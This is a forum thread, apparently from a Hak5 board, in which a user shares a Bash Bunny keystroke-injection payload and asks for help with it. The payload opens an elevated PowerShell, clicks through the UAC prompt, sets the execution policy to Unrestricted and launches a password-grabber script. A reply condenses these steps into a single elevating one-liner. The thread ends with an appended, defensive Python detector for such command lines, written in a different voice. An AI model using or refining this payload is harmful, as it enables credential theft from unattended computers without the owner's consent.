Trhd.life Posted January 15, 2019
Hello, this is my first submitted payload, and I was wondering if I can have any help maturing this script, if there was any way to polish it up. The point of the script is to open an admin PowerShell and then unrestrict the execution policy. It came about due to the password grabber not giving me the results I needed. I start off with a ducky script to set the execution policy, then go on to basically load the password grabber ps1. Any way to make this script better?

Ducky Script:
DELAY 3000
GUI d
DELAY 700
GUI r
DELAY 700
STRING PowerShell
DELAY 700
ENTER
DELAY 700
STRING Start-Process powershell -verb runAs
DELAY 700
ENTER
DELAY 700
ALT y
DELAY 700
STRING Set-ExecutionPolicy UnRestricted
DELAY 700
ENTER
STRING exit
DELAY 500
ENTER
DELAY 500
STRING exit
ENTER

Payload:
LED SETUP
ATTACKMODE HID STORAGE
# Check for switch position to make it easier for us.
GET SWITCH_POSITION
LED ATTACK
if [ -f "/root/udisk/payloads/${SWITCH_POSITION}/ducky_script.txt" ]; then
    QUACK ${SWITCH_POSITION}/ducky_script.txt
    LED FINISH
    sleep 5
    LED ATTACK
    RUN WIN "powerShell .((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\payload.ps1')"
    # Wait until passwords are grabbed.
    sleep 10
    LED FINISH
else
    LED FAIL
    echo "Unable to load ducky_script.txt" >> /root/debuglog.txt
    exit 1
fi
PoSHMagiC0de Posted January 16, 2019
Hmm, when you use the -C or the -E parameter (those are short for command and encodedcommand) it is a bypass, as long as any additions are sucked in as a string to be invoked. But since you want a disabler, you can combine the PowerShell part into one run command:

GUI r
DELAY 700
STRING "powershell -C \"start-process powershell -verb runas -argumentlist '-C set-executionpolicy unrestricted'\""
DELAY 700
ENTER
DELAY 2000
ALT y

Of course, even with the policy restricted you will see the powershell command will run the -C argument, in both instances when it is called.
Trhd.life Posted January 16, 2019 (Author)
Update: My original script does execute the payload but does not save anything in the loot file. I have tried the suggested edit in PowerShell (not being executed by the Bash Bunny) with the following results:

PS C:\Users\PC> "powershell -C \"start-process powershell -verb runas -argumentlist '-C set-executionpolicy unrestricted'""
At line:1 char:18
+ "powershell -C \"start-process powershell -verb runas -argumentlist ' ...
+                  ~~~~~~~~~~~~~
Unexpected token 'start-process' in expression or statement.
    + CategoryInfo          : ParserError: (:) [], ParentContainsErrorRecordException
    + FullyQualifiedErrorId : UnexpectedToken

Also, to be clear, this task is to recover my mother-in-law's FB password to set up her new phone. It does not have to be covert; I am simply using this opportunity to learn more about PowerShell.
PoSHMagiC0de Posted January 16, 2019
That is because those \" are escaping the double quotes on the Bash Bunny, so if you are doing it without the Bunny then it will look like this in the Run command prompt:

powershell -C "start-process powershell -verb runas -argumentlist '-C set-executionpolicy unrestricted'"

If you do it from the Bunny it will look like my previous post.
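Both of PoSHMagiC0de's replies above come down to the same point for a defender: the execution policy is not a security boundary, so the thing worth alerting on is the command line itself. The detector below is an added example, not code from this thread or from Hak5; it scans constructed process-creation command lines (the shape of a Sysmon Event ID 1 or Security 4688 CommandLine field) for the nested elevate-then-unrestrict one-liner, a per-process -ExecutionPolicy Bypass, and -EncodedCommand blobs, which it decodes and rescans. The sample lines, regexes and indicator names are my own assumptions.

```python
import base64
import binascii
import re
from typing import List, Optional

# Constructed samples shaped like a Sysmon Event 1 / Security 4688 CommandLine field (not from a real host).
SAMPLE_COMMAND_LINES = [
    # The elevate-then-unrestrict one-liner from the thread, as the Run box receives it.
    'powershell -C "start-process powershell -verb runas -argumentlist \'-C set-executionpolicy unrestricted\'"',
    # The same policy change hidden behind -E (base64 of UTF-16LE text).
    "powershell -E " + base64.b64encode("Set-ExecutionPolicy Unrestricted".encode("utf-16-le")).decode(),
    # Benign use of -Command: nothing policy-related.
    "powershell -NoProfile -Command Get-Date",
    # Per-process policy override: a lower-severity indicator on its own.
    "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1",
]

# Indicator patterns; short switch forms follow powershell.exe prefix matching (-ex/-ep, -e/-ec/-enc).
SET_POLICY = re.compile(r"set-executionpolicy\s+(?:-executionpolicy\s+)?(?:unrestricted|bypass)\b", re.I)
POLICY_SWITCH = re.compile(r"(?:^|\s)-e(?:x\w*|p)\s+(?:unrestricted|bypass)\b", re.I)
ELEVATE = re.compile(r"start-process\s+[\"']?powershell.*?-verb\s+runas", re.I | re.S)
ENCODED = re.compile(r"(?:^|\s)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.I)

def decode_encoded_command(blob: str) -> Optional[str]:
    """Decode a -EncodedCommand argument (base64 of UTF-16LE); None if it is not one."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None

def analyze(cmdline: str) -> List[str]:
    """Return the sorted indicator names found in one command line (empty when clean)."""
    found = set()
    if SET_POLICY.search(cmdline):
        found.add("set_executionpolicy_unrestricted")
    if POLICY_SWITCH.search(cmdline):
        found.add("executionpolicy_switch_bypass")
    if ELEVATE.search(cmdline):
        found.add("nested_elevated_powershell")
    for match in ENCODED.finditer(cmdline):
        decoded = decode_encoded_command(match.group(1))
        if decoded is not None:
            found.add("encoded_command")
            found.update(analyze(decoded))  # the policy change may sit inside the blob
    return sorted(found)

if __name__ == "__main__":
    for line in SAMPLE_COMMAND_LINES:
        print(analyze(line) or "clean", "<-", line[:60])
```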